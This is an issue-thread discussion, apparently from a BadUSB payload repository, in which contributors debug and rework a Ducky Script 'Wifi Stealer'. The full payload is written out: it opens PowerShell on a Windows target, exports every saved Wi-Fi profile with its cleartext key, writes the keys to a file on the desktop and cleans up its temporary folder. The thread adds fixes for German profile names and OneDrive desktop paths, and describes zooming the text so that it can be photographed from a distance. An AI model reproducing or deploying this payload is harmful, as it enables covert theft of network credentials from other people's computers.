[Bad USB] Wifi-Stealer_Zoom.txt & Wifi-Stealer_ORG.txt

[the0bone]

@7h30th3r0n3 and @johnmckee02 thanks for the script. But

Different languages use different file names. Wi-Fi is not used on germany for example. the xml files are starting with WLAN-*.

In addition is specially on accounts that are connected to a OneDrive Account the %userprofile% different from the c:\user\xyz\desktop\ folder. So even is the files are created, zoom in will bring up nothing.

[7h30th3r0n3]

Hello ! nice to see it being used ! :) what is your Windows version ? My original payload wad french/US based, the payload try both directory with a cd Desktop;cd Bureau but i took it off for international purposes. Maybe you can just add the Desktop folder name corresponding to your language or change the WI-FI- to WLAN-, normally on a standard session opening powershell with GUI R puts us in the user folder, so then you just need go to the desktop folder so that the script can reduce all the windows and locate the 0.txt to open it and zoom into

[the0bone]

Tested it on Win10 Pro and Win11 Home.

To avoid issues, I'm currently working on setting up all files in %temp% and having the Text file done first. New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp\\js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial'> 0.txt;

From here I just need to copy it and can easily Remove-Item $env:temp\js2k3kd4nne5dhsk

But I just saw another topic: `

passPhrase true 01000000D08C9DDF0115D1118C7A00C04FC297EB0F22AA9314504D988010B1C29ADD2921964620D33854FC00000000036AAC5EDBB236882A197A40000000927623B8B57DF97C506B7E4A74B3A57586A7F514E48D9C986E8D0BC6D96DFB777DE0C18BD1826E7B8217F281ABD6632F8A9B203A2C2106CCAECF50314646F500

`

Seems that not all phrases are stored in cleartext. :(

[7h30th3r0n3]

I have already seen that, it is because the key is pre-shared or not, if the password of the wifi network comes from another user the pre-shared key is encrypted to pass it to another user, this is also a workaround to harden this Windows "feature"

[the0bone]

@7h30th3r0n3 as a work around for languages etc. I try to use notepad. If you open notepad from %temp% in PowerShell... Where does it point to? notepad.exe 0.txt ENTER DELAY 4000 CTRL-SHIFT S

On my tests notepad like to store the opend file on the Desktop we want to have the file.

[the0bone]

Total idea looks like: REM Creating a new folder in Temp with random name to store the xml files and create single text file. New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp\\js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial'> 0.txt; DELAY 4000 REM open the Editor to store the text file on the User Desktop even if that is a onedrive Folder. notepad.exe 0.txt ENTER DELAY 4000 CTRL-SHIFT S ENTER ALT F4 DELAY 500 REM Editor should be closed and the curser is back in Powershell to clean up the work and exit it. cd ..; Remove-Item -Path "$env:tmp/js2k3kd4nne5dhsk" -Force -Recurse; exit

[the0bone]

This is now working with OneDrive Accounts where Desktop is linked to the MS Account.

REM Title: Wifi Stealer REM Author: 7h30th3r0n3 REM Reworked: the0bone REM Target: Windows 7/8/10/11 REM Version: 1.2 REM Category: Grabber REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop REM Designed to be used for mouse hijacking on a machine whose screen is visible GUI r DELAY 500 STRING powershell ENTER DELAY 6000 REM Creating a new folder in Temp with random name to store the xml files and create single text file. STRING New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial'> 0.txt; ENTER DELAY 4000 REM open the Editor to store the text file on the User Desktop even if that is a onedrive Folder. STRING notepad.exe 0.txt ENTER DELAY 2000 CTRL-SHIFT S ENTER ALT F4 DELAY 2000 REM Editor should be closed and the curser is back in Powershell to clean up the work and exit it. STRING Set-Location -Path "$env:temp"; Remove-Item -Path "$env:tmp/js2k3kd4nne5dhsk" -Force -Recurse; exit ENTER

[7h30th3r0n3]

I need to test out to see if it work everywhere ;) also it seems that you have mixed the two payloads, the wifi stealer and the wifi stealer zoom, the paylaod wifi stealer zoom, zoom in the notepad for a few seconds in order to be able to retrieve the information visually with a photo or binoculars when you mouse hijacking, im on my phone but i think it's just a miss copy-paste of the REM section :) the delay seem to be a little bit high too, but yeah let me do some test with it and I will make a PR afterwards, thank you for the investment and the warning :)

[UberGuidoZ]

Excellent discussions. Once this gets sorted out we can make any recommended changes. Thanks, @the0bone!

Feel free to do a PR when ready (or @7h30th3r0n3 too.) =)

[the0bone]

I need to test out to see if it work everywhere

No it did not. :( Tested on 8 PCs with different setups. Just 3 worked. Positive: WLAN-*.xml and WiFi-*.xml issue is sorted out with the own folder. Negative: The Editor is not always pointing to the same folder.

Still do to: Find a way to to Desktop for OneDrive Synced and non Synced User.

[7h30th3r0n3]

No it did not. :( Tested on 8 PCs with different setups. Just 3 worked.

ho... what a pity... do you know where it comes from?

Positive: WLAN-.xml and WiFi-.xml issue is sorted out with the own folder.

i checked this one and yeah, it seem possible to fix that quickly, the *.xml is more efficient than the WI-FI* ;) Still do to: Find a way to to Desktop for OneDrive Synced and non Synced User.

Maybe you can use the official Windows API with $DesktopPath=[Environment]::GetFolderPath("Desktop") to save it on the Desktop. I dont know if it work with OneDrive Synced User...

[the0bone]

Yes, also the Hak5 community brought that solution up. Set-Location ([Environment]::GetFolderPath("Desktop"))

I'll play around with that later the day.

[the0bone]

Tested and PR created.